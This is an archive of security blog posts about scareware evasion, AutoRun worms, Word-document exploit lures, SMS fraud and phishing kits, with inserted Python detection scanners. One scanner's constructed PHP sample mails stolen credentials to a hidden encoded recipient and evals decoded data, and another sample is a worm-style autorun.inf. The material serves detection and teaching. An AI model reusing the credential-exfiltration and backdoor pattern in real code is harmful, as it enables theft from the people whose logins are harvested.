Archive for the 'General Chatter' Category

FakeAlerts Uncovered

It has been almost a year since rogue antivirus products, a.k.a. scareware, became rampant. These Trojan families are typically spread via drive-by downloads, SEO poisoning, spam campaigns and clever social engineering.
Having discussed those distribution methods in earlier posts, today we will look at the protection mechanisms these FakeAlert Trojan families adopt to evade detection by antivirus vendors.

  • Code obfuscation using junk instructions

In the above screenshot, a lot of junk code is visible between the valid instructions. Junk instructions change no program state; they only pad the code and break byte-pattern signatures, and they are used widely across FakeAlert families.

  • Fake API calls

The screenshot shows a call to the SetArcDirection API, which serves no purpose in the code. Such unnecessary API calls are used by malware to defeat emulation: an emulator that does not implement the API faithfully behaves differently from a real system. Sometimes API calls that do not exist at all are used by these families to check whether they are being emulated, since a real system fails to resolve them while a sloppy emulator may pretend to succeed.

  • Customized packer

Many FakeAlert families use their own custom packers and encryption routines. Some of the families patch existing packers instead.

  • Use of XMM and MMX instruction sets

Use of XMM, MMX and FPU instructions that the code does not need, mixed in with the other junk code, is also found in most FakeAlert families; emulators that implement these instruction sets incompletely tend to give up or misbehave on them.
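Junk-instruction padding is easy to see in a disassembler but also easy to measure mechanically. The following scanner is an added example, not code from the original post: it counts the bytes occupied by a handful of well-known do-nothing x86 encodings (the pattern table is an assumption, and a real tool would let a disassembler decide instruction boundaries rather than matching fixed byte strings) and reports the junk ratio for two constructed code samples.

```python
"""Junk-instruction density heuristic (added example, not from the original post)."""
from __future__ import annotations

# Encodings that leave all architectural state unchanged (32-bit code assumed).
# Assumption: only a few common junk sequences are listed; extend as needed.
JUNK_PATTERNS = {
    b"\x90": "nop",
    b"\x87\xc0": "xchg eax, eax",
    b"\x8b\xc0": "mov eax, eax",
    b"\x89\xc0": "mov eax, eax",
    b"\x8d\x40\x00": "lea eax, [eax+0]",
    b"\x50\x58": "push eax / pop eax",
    b"\x51\x59": "push ecx / pop ecx",
}

# Try longer encodings first so a 3-byte junk instruction is not counted as unrelated bytes.
_ORDERED = sorted(JUNK_PATTERNS, key=len, reverse=True)


def junk_density(code: bytes) -> tuple[float, dict[str, int]]:
    """Return (fraction of bytes that are junk, count of each junk mnemonic seen)."""
    if not code:
        return 0.0, {}
    junk_bytes = 0
    seen: dict[str, int] = {}
    pos = 0
    while pos < len(code):
        for pat in _ORDERED:
            if code.startswith(pat, pos):
                junk_bytes += len(pat)
                seen[JUNK_PATTERNS[pat]] = seen.get(JUNK_PATTERNS[pat], 0) + 1
                pos += len(pat)
                break
        else:
            pos += 1  # not a known junk encoding; step one byte (no disassembler here)
    return junk_bytes / len(code), seen


def looks_padded(code: bytes, threshold: float = 0.3) -> bool:
    """Flag code where more than `threshold` of the bytes are junk (threshold is an assumption)."""
    return junk_density(code)[0] > threshold


# Constructed samples: the same tiny function with and without junk interleaved.
CLEAN = bytes.fromhex("558bec33c05dc3")  # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret
PADDED = (
    bytes.fromhex("558bec")        # push ebp; mov ebp,esp
    + bytes.fromhex("9087c05058")  # nop; xchg eax,eax; push eax; pop eax
    + bytes.fromhex("33c0")        # xor eax,eax
    + bytes.fromhex("8d400090")    # lea eax,[eax+0]; nop
    + bytes.fromhex("5dc3")        # pop ebp; ret
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("padded", PADDED)):
        ratio, hist = junk_density(blob)
        print(f"{name}: {ratio:.2%} junk, {hist}, padded={looks_padded(blob)}")
```

Applied per function, with a disassembler fixing instruction boundaries, this is what an "abnormally padded code" heuristic looks like. The byte-string version here will miscount when a junk encoding happens to appear inside an operand, which is the caveat to keep in mind before trusting the ratio.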

The techniques discussed above are not new and have been used in other notable malware, but FakeAlert Trojans use these evasion techniques to their full potential with every new variant. Just when we thought we were seeing a decline in adware and spyware, FakeAlert Trojan families have stepped in to claim the scum-of-the-Internet tag.

Worms Dig Further Than Thumb Drives

Almost every day I see AutoRun worms such as this one. You may know the kind: worms designed to replicate onto removable drives by dropping a copy of themselves and an autorun.inf that launches it when the drive is plugged in. There is certainly no shortage of these little monsters.

Often the worm, although problematic in itself, is just the harbinger of potential doom. The more malicious malware that these worms download can lead to full-blown havoc, or at a minimum a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into USB connectors to seal off access completely. That is probably not the best way to solve the problem; think disabling AutoPlay, keeping antivirus up to date, enabling a firewall, and so on.

But prevention is not the point I am trying to make; there is already a myriad of advice on the Internet for that. All I am saying is that AutoRun worms can spread beyond the USB sticks we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with a few extra functions, and one unintended aspect of that functionality is to assist in worm propagation.
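To see what the worm actually relies on, here is an added example (not code from the original post) that parses an autorun.inf the way Windows reads it and lists the entries that would launch a program on insertion: open=, shellexecute= and shell\<verb>\command=. Both autorun.inf samples are constructed, and the list of executable extensions is an assumption. Microsoft later (February 2011, KB971029) stopped Windows from honouring autorun.inf on non-optical media, but a device carrying one still tells you where it has been.

```python
"""autorun.inf triage (added example, not from the original post)."""
from __future__ import annotations

import configparser

# [autorun] keys that cause code to execute on insertion, plus shell\<verb>\command.
EXEC_KEYS = ("open", "shellexecute")
# Assumption: a launch target ending in one of these is treated as code.
CODE_EXTENSIONS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".hta", ".dll")


def _parse(text: str) -> configparser.ConfigParser:
    # Keys are lower-cased by configparser, matching Windows' case-insensitive lookup;
    # interpolation is off so values such as %SystemRoot% stay literal.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def launch_entries(text: str) -> list[tuple[str, str]]:
    """Return (key, target) pairs from [autorun] that would run code on insertion."""
    cp = _parse(text)
    if not cp.has_section("autorun"):
        return []
    found = []
    for key, value in cp.items("autorun"):
        if key in EXEC_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            found.append((key, value.strip()))
    return found


def points_at_code(target: str) -> bool:
    """True when the launch target's first token names an executable file type."""
    tokens = target.split()
    if not tokens:
        return False
    return tokens[0].strip('"').lower().endswith(CODE_EXTENSIONS)


def triage(text: str) -> dict:
    """Summarise one autorun.inf: what it launches and whether that looks like code."""
    entries = launch_entries(text)
    return {
        "launches": entries,
        "suspicious": any(points_at_code(target) for _, target in entries),
    }


# Constructed sample: the shape a worm typically drops (hidden copy plus launch keys).
WORM_STYLE = """[autorun]
open=hidden\\update.exe
icon=hidden\\update.exe,0
action=Open folder to view files
shell\\open\\command=hidden\\update.exe
shell\\open\\default=1
"""

# Constructed sample: a harmless label/icon-only file.
BENIGN = """[autorun]
label=Holiday photos
icon=photos.ico
"""

if __name__ == "__main__":
    for name, sample in (("worm-style", WORM_STYLE), ("benign", BENIGN)):
        print(name, triage(sample))
```

Point it at the root of any removable volume, camera card or MP3 player: a label/icon-only file is normal, an open= or shell\open\command= entry pointing at an executable is exactly what the worm plants.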

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

Fight Against Cybercrime Gets Organized

The fight against cybercrime has shown some very promising progress over the last few years. We are certainly not where we want to be, but we are on a good path. McAfee's own Initiative to Fight Cybercrime has been in force for more than half a year. Recently our Cybercrime Response Unit was launched: an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all, we are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the official program, connecting researchers from security companies, CERTs and law enforcement agencies throughout the world with each other to talk over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future! ;)

Swine Flu Spam

The swine flu pill spam has started, and it is taking a few Hollywood stars' names in vain. Nothing out of the ordinary with the sites at the far end yet, though I do expect oseltamivir (a.k.a. Tamiflu) to get some extra exposure once the affiliate pill sites are updated.

Swine Flu

Subjects:

First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!

Also, we've noticed that domain name registrations mentioning the word "swine" are up by about 30 times, and you can bet your daughters it's not all going to be "whitehat" SEO.

New Conficker Variant

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee's coverage and protection for the MS08-067 vulnerability is available here.

For measures to protect yourself and your organization against Conficker, please visit:

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

MS09-002 Exploit in the wild uses MSWord Lure

An exploit targeting a recently patched vulnerability in Internet Explorer 7 has been discovered in the wild. Malware crooks were quick to develop a working exploit for the vulnerability, which was fixed in the February Microsoft patch release (MS09-002, CVE-2009-0075). Microsoft rated the vulnerability critical, with an Exploitability Index rating of "consistent exploit code likely". The modus operandi bears a close resemblance to the zero-day attack using Word documents that we blogged about in December 2008.

The attack is delivered as a maliciously crafted Word document sent to unsuspecting users. The document contains an embedded ActiveX control which, when the document is opened, connects to a website hosting the MS09-002 exploit.

Malware authors are always working on new and improved ways to evade detection and control compromised machines. This time they introduced obfuscation (base64 encoding), presumably to hinder easy analysis and signature detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not yet patched, we suggest installing the MS09-002 update immediately. It is only a matter of time before variants of this exploit circulate in the wild and are incorporated into the various do-it-yourself web attack toolkits.

The malicious Word document is detected by the current DATs as Exploit-MSWord.k, and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Counting Malware

Malware continues to increase at a rapid rate. With the DAT 5516 release, scheduled for 4 February, the number of drivers (detection records) in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the '80s, that had a count of about 80. I don't recall the exact number, but it is easy to put into perspective: we now add far more than that every day.

However, the current count is not an absolute number of detected malware files, which confuses many people. Drivers can be written very specifically, say one driver for one sample, but that is not very effective. Most drivers are written to detect many samples generically; one driver can detect 50 or as many as thousands of malware files. The number of detected malware files is therefore far higher than the half-million reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget's blog as well.

Initially VirusScan focused only on true self-replicating viruses, mainly 8-bit (.com/.exe) MS-DOS viruses and boot-sector viruses, which were prevalent then, and some still are today. Malware has since evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (PE .exe) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware consists of static Trojans.

There has also been a big shift among malware authors. The first malware authors were hobbyists writing to prove it could be done, but today we mainly see malware that is after money: password stealers and the like. Malware is often developed in a professional environment, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

Real-World Social Engineering to Spread Malware Online

An innovative social-engineering technique in which the virtual world meets the real world was described recently by SANS analyst Lenny Zeltser. The original post can be found here.

Apparently, yellow fliers were placed on vehicles in a parking lot, claiming that the vehicles were in violation of parking regulations. The fliers further stated that the owner could visit a certain website to get more information and pictures of the offense.

Upon visiting this website, the victims were asked to download a toolbar [PictureSearchToolbar.exe], which claimed to let them search for more pictures of their vehicles. What the toolbar really does is download malicious files from the Internet; those files in turn download more malware.

Here’s a screenshot of the website:

McAfee detects the original toolbar [PictureSearchToolbar.exe] as Vundo.dldr!1231E9AC from DAT Version 5516 onward, while the dropped and downloaded files are already detected as Vundo Trojan.

Pay to install free software

I was dealing with customer escalations the other day and came across this interesting sample. If you believed the filename, install_wrar380.exe, it would install WinRar on your system; for some reason I didn't believe it ;)

Upon execution, the installer displays an EULA. I have copied and pasted some of the detail below:

“THE COST OF EACH SMS FROM THE USER’S MOBILE PHONE IS TWO POUNDS. UNLESS OTHERWISE SPECIFIED, THE DOWNLOAD COST SHALL BE FOUR SMS.
Please read these USAGE CONDITIONS carefully and, if appropriate, use the download service which shall imply the express and complete acceptance of each and every one of these USAGE CONDITIONS. Otherwise, please close this website.
Netlink Network Corp. offers a PREMIUM high speed download service that is efficient and virus free. In exchange, the user shall first send two SMS under the conditions specified in clause 2.2 that defines the commercial conditions of the service”

These two sections really caught my eye. From what I understood I was going to be charged £8 in the form of 4 SMS text messages so that I can download WinRar. Alarm bells started to ring.

I clicked ‘I agree’ and was prompted for a code. To get this code, I would have to send 2 SMS text messages to 78*** (Number has been blanked out for security reasons) with the text body ‘CD’ and I would be charged £3 for each text message. This was different to what the EULA said, but as it was cheaper I wasn’t going to argue. Also note how the text is almost the same color as the background to make it difficult to see.

WinRar installer

As I was interested to find out if it really would install WinRar, I went to my local mobile phone store and bought a mobile phone, put £10 on it and sent a text message to the number. To my surprise, I received a text back saying:

“SMS 1/3. Price per SMS: 3 Pounds. Total cost: 9 Pounds.”

It now cost me £9 instead of £6 to download some free software. This was also more than the £8 the EULA said it would cost me. I received a further 2 text messages and the final one was labelled 2/3 even though it was the 3rd. I guess they don’t have QA. You can see the text messages I received below:

SMS 1/3

SMS 2/3

SMS 3/3

I entered the code and clicked on the ‘Install’ button. The software downloaded WinRar and went on to install it for me.

WinRar installer with code

I found the website which the sample came from and it displayed the following text at the bottom of the page:

“This website does not belong to any member´s program. This program should be used based on rules of intellectual property. You may obtain this program for free from the official homepage. Using or applying cracks, serials or keygens is strictly forbidden. This portal will not be held accountable for inappropriate use of the program. Your query has been sent succesfully. You will receive an answer shortly. Thank you for using our services. Due to technical issues, your query could not be sent. We apologize for the inconvenience”.

So they admit that you can download this software for free from its official homepage. They are clearly trying to trick the unsuspecting user to pay for free software.

I thought perhaps they had done this with other free software, so I did some investigating and found several other websites registered to the same company, offering several other pieces of free software for the small price of £6, or £9 as I found out.

I found installers for Messenger Plus! Live, WinZip, WinAce, 7Zip and several others. All of these can be downloaded for free from their official sites.

Messenger Plus! Live website

The websites are aimed at English, French and Spanish users. Luckily for our European friends, they can pay for the free software in euros.

While navigating these sites, two different company names kept popping up: Netlink Network Corp and Soletto Group, S.A. I did some quick searching but couldn't find any details on these companies.

Some of the domains had been registered as recently as late last month, so I believe we are likely to see more pop up.

I pulled all the executables I could find on the websites and added detection as SMSFraud.

Please be on the lookout for these in the future as you don’t want to pay for something which is already free.

The McAfee 2009 Threat Predictions

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Lowest False Alarm Award!

Igor Muttik just had a parcel arrive whilst I was nearby. McAfee has just won the Lowest False Alarm Rate award from AV Comparatives for VirusScan.

Award

….I didn’t stay for the speech ;)

For those who do not know, a false alarm is when an anti-virus product detects a clean file as infected, and it is something all AV companies try hard to avoid. Recognition that we have the lowest false alarm rate on test is awesome.

Google Code Project Abused by Spammers

Google's code-hosting service is the latest free service to be abused by web spammers. We had seen one or two cases previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of page:

google code pic

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse, which is now about a year old, is that Google appears to index code projects automatically, so any Google-Jedi can generate a good list to start with (Google Search; again, don't click the links).

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. ;) The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porn-tube site also hosts a number of other related sites, such as fake anti-anything software:

google code net pic

The codec download site, which is in Latvia, also hosts a number of related sites:

google code net pic

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta having a very similar issue. I even spoke to some very nice folks there about it, and a year later it is still being abused by spammers [Spamhaus award]. I trust Google would like to appear less evil and will take more decisive action. I'd suggest mashing Code and Safe Browsing together, but Safe Browsing appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing ;)

Anybody suffering déjà vu? "/in.cgi" should ring an alarm bell or two. If not, check out my colleague Micha's blog on traffic management; he explains what happens to those clicks. This is campaign "6".

Happy new year to all!

IE 7 Exploit Reloaded: The new face of Drive-by Attacks using Doc files

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information now public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit and social-engineer less tech-savvy Internet users. One of the most prominent and unusual techniques involves a Microsoft Word document sent to an unsuspecting user.

Upon opening the Word document, the embedded ActiveX control with the following classid is instantiated and executed:

  • {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This classid identifies the Microsoft Scriptlet Component.

ActiveX

The control then makes a request to the web page hosting the IE 7 exploit. The charm of this approach is that the exploit is downloaded and run without the knowledge or permission of the user; to the unsuspecting user it appears to be just another normal .doc file.

Microsoft has issued workarounds to block the known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious when opening unknown .doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against it.
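Both the MS09-002 post above and this one describe the same lure: a Word document whose embedded ActiveX control is the Microsoft Scriptlet Component, {AE24FDAE-03C6-11D1-8B76-0080C744F389}. The following scanner is an added example, not code from either post. It searches a file for that CLSID in the forms it actually takes on disk: the 16-byte little-endian GUID structure inside an OLE2 (.doc) storage, and the textual spelling inside the ActiveX part of an Office Open XML (.docx) package, which it unzips part by part. The sample documents are constructed byte strings, not real lures, and the XML namespace in the .docx sample is reproduced from memory and should be treated as an assumption.

```python
"""Find the Scriptlet Component CLSID in a document (added example, not from the posts)."""
from __future__ import annotations

import io
import re
import uuid
import zipfile

SCRIPTLET_CLSID = uuid.UUID("AE24FDAE-03C6-11D1-8B76-0080C744F389")  # CLSID named in the post
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"


def clsid_forms(clsid: uuid.UUID) -> dict[str, bytes | re.Pattern[bytes]]:
    """Every on-disk spelling of a CLSID worth searching for."""
    text = re.escape(str(clsid).encode("ascii"))
    return {
        "binary-le": clsid.bytes_le,  # GUID struct as stored in OLE2 directory/CompObj entries
        "text": re.compile(rb"(?:clsid:)?\{?" + text + rb"\}?", re.I),  # {..}, clsid:.., bare
        "text-utf16le": re.compile(re.escape(str(clsid).encode("utf-16-le")), re.I),
    }


def find_clsid(data: bytes, clsid: uuid.UUID = SCRIPTLET_CLSID) -> list[tuple[str, int]]:
    """(form, offset) for each occurrence of the CLSID in one blob of bytes."""
    hits: list[tuple[str, int]] = []
    for form, needle in clsid_forms(clsid).items():
        if isinstance(needle, bytes):
            start = 0
            while (idx := data.find(needle, start)) != -1:
                hits.append((form, idx))
                start = idx + 1
        else:
            hits.extend((form, m.start()) for m in needle.finditer(data))
    return sorted(hits, key=lambda h: h[1])


def container_kind(data: bytes) -> str:
    """Classify by magic bytes: legacy OLE2 (.doc) or OOXML zip (.docx)."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    return "unknown"


def scan_document(data: bytes, clsid: uuid.UUID = SCRIPTLET_CLSID) -> list[tuple[str, str, int]]:
    """(part, form, offset) hits for a whole file: OLE2 blobs directly, OOXML zips part by part."""
    if container_kind(data) == "ooxml-zip":
        hits = []
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                hits.extend((name, form, off) for form, off in find_clsid(zf.read(name), clsid))
        return hits
    return [("<file>", form, off) for form, off in find_clsid(data, clsid)]


def suspicious(data: bytes) -> bool:
    """A document that embeds the Scriptlet Component at all deserves a closer look."""
    return bool(scan_document(data))


# --- constructed samples (not real lures) ---------------------------------------------
# Minimal OLE2-looking blob: header magic, padding, then the binary GUID at offset 48.
OLE_SAMPLE = OLE2_MAGIC + b"\x00" * 40 + SCRIPTLET_CLSID.bytes_le + b"\x00" * 24
# Same shape carrying the Word 97-2003 document CLSID instead, which is normal for a .doc.
CLEAN_SAMPLE = OLE2_MAGIC + b"\x00" * 40 + uuid.UUID("00020906-0000-0000-C000-000000000046").bytes_le
# A docx ActiveX part; the namespace URI is reproduced from memory (assumption).
DOCX_PART = (
    b'<ax:ocx xmlns:ax="http://schemas.microsoft.com/office/2006/activeX" '
    b'ax:classid="{AE24FDAE-03C6-11D1-8B76-0080C744F389}" ax:persistence="persistPropertyBag"/>'
)


def _build_docx(part: bytes) -> bytes:
    """Wrap the ActiveX part in a minimal zip package the way a .docx would."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/activeX/activeX1.xml", part)
    return buf.getvalue()


DOCX_SAMPLE = _build_docx(DOCX_PART)

if __name__ == "__main__":
    for name, blob in (("ole", OLE_SAMPLE), ("clean", CLEAN_SAMPLE), ("docx", DOCX_SAMPLE)):
        print(name, container_kind(blob), scan_document(blob))
```

Searching all three spellings matters: the binary GUID is what a .doc carries in its ObjectPool storage, while a .docx spells it out in XML, and a scanner that only knows one form misses the other lure.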

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. In this issue we take aim at the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Loss Leaders in Phishing

Q: How do you want to build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

scam site

I suspect that this is a shareware-style, lead-generation setup, as the phishing kits appear to be of relatively poor quality. (So poor, in fact, that I expect the most experienced brands would be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too; I guess they gotta pay the hosting bill somehow!
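A backdoored kit of the kind mentioned above mails the harvested credentials to whoever deployed it and, through an encoded string the deployer is not meant to read, to the kit author as well. The audit below is an added example, not the original post's code or any real kit: it pulls every base64 literal handed to base64_decode(), decodes it, and reports decoded e-mail addresses and eval() of decoded data. The PHP fragments are constructed, with example.com/.net addresses.

```python
"""Spot hidden recipients and eval'd payloads in a phishing kit (added example)."""
from __future__ import annotations

import base64
import binascii
import re

# A base64 literal passed straight to base64_decode(); 8+ chars to skip noise.
B64_LITERAL = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]{8,})['"]\s*\)""")
# eval(base64_decode(...)) with any number of wrapper calls, e.g. eval(gzinflate(base64_decode(
EVAL_OF_DECODED = re.compile(r"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode", re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def hidden_strings(php: str) -> list[tuple[str, str]]:
    """(encoded, decoded) for each base64 literal passed to base64_decode()."""
    out = []
    for enc in B64_LITERAL.findall(php):
        try:
            out.append((enc, base64.b64decode(enc, validate=True).decode("utf-8", "replace")))
        except (binascii.Error, ValueError):
            continue  # not valid base64; leave it for manual review
    return out


def audit_kit(php: str) -> dict:
    """Compare the recipients visible in the source with those hidden behind base64."""
    visible = sorted(set(EMAIL.findall(php)))
    hidden = sorted({dec for _, dec in hidden_strings(php) if EMAIL.fullmatch(dec.strip())})
    evals = bool(EVAL_OF_DECODED.search(php))
    return {
        "visible_recipients": visible,
        "hidden_recipients": hidden,
        "eval_of_decoded": evals,
        "backdoored": bool(hidden) or evals,
    }


# Constructed sample: what the deployer sees on the surface, plus what the author slipped in.
BACKDOORED_KIT = r'''<?php
$to = "collector@example.com";
$body = "user=" . $_POST['user'] . " pass=" . $_POST['pass'];
mail($to, "Result", $body);
// hidden second recipient and an eval'd blob, both base64 so they don't catch the eye:
mail(base64_decode("a2l0LWF1dGhvckBleGFtcGxlLm5ldA=="), "Result", $body);
eval(base64_decode("ZWNobyAnYmFja2Rvb3InOw=="));
header("Location: https://www.example.com/");
?>'''

# Constructed sample: the same kit with nothing hidden.
CLEAN_KIT = r'''<?php
$to = "collector@example.com";
mail($to, "Result", "user=" . $_POST['user']);
?>'''

if __name__ == "__main__":
    for name, src in (("backdoored", BACKDOORED_KIT), ("clean", CLEAN_KIT)):
        print(name, audit_kit(src))
```

Run it over every .php in an unpacked kit; a second recipient that only exists after decoding, or an eval() over decoded data, is the signature of a kit whose author is still collecting.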

Kudos to the host in Germany for taking down the site next day; you know who you are. ;)

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: all roads of further investigation lead back to France. The details have been with the national police for some time now (hence the delay in posting).

From Torrents to Casinos, Redirect Chaining Is Back in Fashion

Casino spammers have recently been chaining together a lot of link redirectors to avoid being taken down by redirector sites that check anti-spam blacklists.

Here is a good example from one of our partner traps of how you go from one of the most popular torrent forums on the web to a Malta-based casino in one click.

This is the URL used in the email and our starting point:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h

Here is the redirection chain:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 301 Moved Permanently

http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 200 OK
(and the chain stops here if you are using LWP, which does not follow the Refresh header)

HEADER : Refresh: 0;url=http://tinyurl.com/4nr46h

GET http://tinyurl.com/4nr46h
--> 301 Moved Permanently

GET http://blog.com/redirect/?url=http://maltytotrough.com?6ccbe5z5p
--> 302 Found

GET http://maltytotrough.com?6ccbe5z5p
--> 302 Found

GET http://www.spinpalace.com/index.asp?a=634991
--> 301 Moved Permanently

(then they hide the affiliate string for some reason)

GET http://www.spinpalace.com/
--> 200 OK

Affiliate 634991, your time is up. ;)

